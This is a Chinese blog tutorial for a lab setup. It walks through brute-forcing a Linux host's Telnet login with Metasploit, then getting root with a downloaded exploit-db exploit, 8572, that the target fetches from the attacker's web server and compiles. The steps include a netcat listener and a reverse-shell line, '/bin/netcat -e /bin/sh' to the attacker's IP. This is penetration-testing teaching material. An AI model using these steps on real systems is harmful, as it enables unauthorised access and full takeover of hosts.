Telnet爆破提权

已于 2022-01-29 20:56:25 修改
阅读量2.9k 收藏 7
点赞数 3
文章标签: linux ssh debian 安全 rpc
于 2020-03-18 15:16:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43432963/article/details/104943065
版权

准备环境:

搭建一台kali和一台Linux即可测试成功

攻击主机:192.168.1.166

被攻击主机:192.168.1.167

在攻击主机中首先利用nmap进行端口扫描,看下被攻击主机是否开启telnet


利用kali进行telnet爆破:

 在kali中利用msfconsole进行破解登录telnet

配置好之后然后输入run进行爆破,以下是爆破结果

然后使用sessions -l 查看会话连接

使用sessions -i 1回车进行连接shell,然后输入id查看是否爆破成功

接下来开始提权:

首先在kali中利用内存监听本地4444端口

nc -lvp 4444

在kali中搭建网站并下载下载exploit文件http://www.exploit-db.com/download/8572文件

wget http://www.exploit-db.com/download/8572

然后开启kali中Apache2网站,然后查看网站状态是否开启

service apache2 start
service apache2 status

 把下载好的exploit,复制到网站根目录,并命名为test.c

mv 8572 /var/www/html/test.c

 被攻击端下载test.c文件

wget http://192.168.1.166/test.c
# 下一步进行编译,并输入内容到/tmp/run文件当中
gcc test.c -o exploit
echo "#!/bin/sh">/tmp/run
echo '/bin/netcat -e /bin/sh 192.168.1.166 4444' >> /tmp/run
# 过滤udev
ps -edf | grep udev

最后执行exploit具有root权限的pid -1

 查看监听状态,输入whoami查看返回值为root表明已提权成功!

Conconcar
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
Linux离线telnet安装包
07-22
Linux离线telnet安装包
kali新手入门教学(12)--telnet服务及账号密码抓取
azraelxuemo的博客
05-25 2492
telnet 协议在网络传输中采取明文的形式传输用户名和密码。攻击者利用该特性就可获得被攻击者的敏感信息,并进行进一步的攻击。 telnet在win10里面安装网上教程有问题 telnet分为client(客户端)和服务端 服务端顾名思义,提供连接服务的,客户端主动连接服务端 而现在的win10里面只提供了telnet客户端,只可以去连接那些具有telnet服务端的主机,而不能别人连你,否则会报错 正在连接192.168.3.128...无法打开到主机的连接。 在端口 23: 连接失败 首先我们安装客户端
msfconsole实战使用(结合靶场演示),网络安全开发两年
最新发布
m0_60667384的博客
04-06 523
msfconsole的利用流程自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
开启kaliTelnet
qq_43754475的博客
03-19 8205
做实验的时候突然发现kali与克隆机之间无法Telnet,经过查阅资料后发现需要下载安装,具体操作如下: 首先,安装xinetd telnetd: 然后查看一下服务是否启动: 这样就是启动了,如果没有,就启动它,操作如下: 之后创建并编辑/etc/inetd.conf文件 然后编辑/etc/xinetd.conf,结果如下: 然后重启服务: 测试: ...
内网渗透(telnet爆破)
m0_46684679的博客
07-27 3490
python实现变位词 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy
kaliLinux 安装 telnet
paBYss的博客
02-26 1277
安装 xinetd telnetd apt-get install xinetd telnet 查看服务启动状态 sudo /etc/init.d/xinetd 创建编辑 vi /etc/inetd.conf 在文件末尾加上 defaults { # Please note that you need a log_type line to be able to use log_on_s...
口令暴力破解--Telnet协议暴力破解、数据库暴力破解与远程桌面暴力破解
薛定谔的猫
04-12 5138
用户可以通过输入用户名和密码来登录数据库服务器。输入如下命令:exec master.dbo.xp_cmdshell 'ipconfig',再输入go,可以发现ipconfig成功执行,获取目标操作系统的ip信息。开启kali-linux虚拟机,打开命令行窗口运行NMAP,输入命令nmap -v -A -Pn 193.168.1.24,对该IP地址进行扫描。在本机打开命令行,输入mysql -h 193.168.1.38 -u root –p,输入密码admin888,尝试登录mysql服务器。
4.6、漏洞利用-Telnet
c10udz的博客
10-03 2677
Telnet服务,即远程终端协议服务,使用明文传输用户的所有内容,具有安全隐患。Telnet服务默认使用23端口(1)使用nmap获取(2)使用metasploit。
安鸾渗透telnet暴力破解
LHBD_R的博客
07-28 1345
1.telnet破解账号密码 题目domain:www.whalwl.icu port:2323 给我们了一个密码本,并且旁边给了一个让我们确认是否文件完整性的hash值,下载好密码本后查看hash值是否一致。 确认文件完整性完整,现在可以利用各种渗透工具来尝试爆破telnet 2.获取ip地址,ping所给的domain,来获取ip,获取到的ip地址为118.190.133.35 3获取到ip地址后,打开kali,准备好密码字典与用户字典,因为这里没有给我们字典...
Kali安装telnet详细教程
xcsxchen
03-15 2188
Kali安装telnet详细教程
利用kali爆破telnet
weixin_44281516的博客
04-16 3059
第一步启动msfconsole search telnet use auxiliary/scanner/telnet/telnet_login,然后show options set rhosts IP(目标IP) set USERPASS_FILE /usr/share/wordlists/metasploit/piata_ssh_userpass.txt (设置爆破所使...
telnet离线安装包
06-07
包括以下几个包: telnet-0.17-47.el6.x86_64.rpm telnet-server-0.17-47.el6.x86_64.rpm xinetd-2.3.14-38.el6.x86_64.rpm
telnet rpm安装包
02-27
telnet rpm安装包
Linux telnet 工具安装包
01-31
Linux telnet 工具安装包 用telnet命令来测试端口号是否正常打开还是关闭状态 安装命令:rpm -ivh telnet-0.17-48.el6.x86_64.rpm
centos 7.7 telnet安装包
08-04
linux环境下telnet安装包,包含: telnet-client 客户端安装包、telnet-server服务端安装包和xinetd依赖包。
Kali开启telnetd服务
qq_38365038的博客
02-02 650
摘要:kali开启telentd服务
telnet爆破
qq_54713392的博客
05-09 263
telnet爆破 利用msf中的telnet_login模块对metasploitable的ssh服务实施爆破攻击 在kali里启动msf 使用search查询telent_login模块,然后使用use调用该模块 设置连接metasploitable的ip地址,使用set rhosts ip地址 设置用户名和密码文件 Run实行爆破 ...
6-7漏洞利用-Telnet暴力破解
山兔的博客
07-12 2854
Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。我们本地有台计算机,远程有台服务器,服务器上开启telnet服务,我们可以通过本地的机器连接到telnet服务器,然后执行对应的系统命令,服务器执行完成之后,会将结果返回到本地计算机,中间通过的协议就是telnet协议在终端使用者的电脑上使用telent程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务
telnet 弱口令爆破 菜刀提权
qq_56889067的博客
11-15 7327
第一题、使用2.txt密字典、爆破test用户的密码 使用nmap -sV 扫描目标靶机 IP 获取 靶机开启的端口及服务的版本信息。 发现开启的有22、23 端口及服务。这里我们使用 telnet服务进行爆破、使用msfconsole打开永恒之蓝。 使用search telnet_login 查看 telnet爆破模块。 使用use 调用 此模块,接着在模块内使用命令options查看需要配置的参数。 接下来配置参数RHOSTS目标IP,PASS_FILE 密码字典,USE...
centos telnet
03-07
CentOS是一种基于Linux的操作系统,而Telnet是一种用于远程登录和管理计算机的协议。在CentOS上使用Telnet可以通过网络连接到其他计算机,并在远程终端上执行命令。 Telnet协议是一种明文传输协议,因此在使用Telnet时需要注意安全性。为了提高安全性,可以考虑使用SSH(Secure Shell)代替Telnet进行远程登录。 在CentOS上安装和配置Telnet服务器非常简单。首先,确保你的CentOS系统已经安装了Telnet服务器软件包。然后,通过以下步骤来配置Telnet服务器: 1. 打开终端并以root用户身份登录。 2. 安装Telnet服务器软件包:`yum install telnet-server` 3. 启动Telnet服务器:`systemctl start telnet.socket` 4. 设置Telnet服务器开机自启动:`systemctl enable telnet.socket` 完成以上步骤后,你就可以使用Telnet客户端连接到CentOS服务器了。可以使用以下命令来连接到远程服务器: `telnet <服务器IP地址>` 请注意,为了安全起见,建议在生产环境中使用SSH代替Telnet进行远程登录和管理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值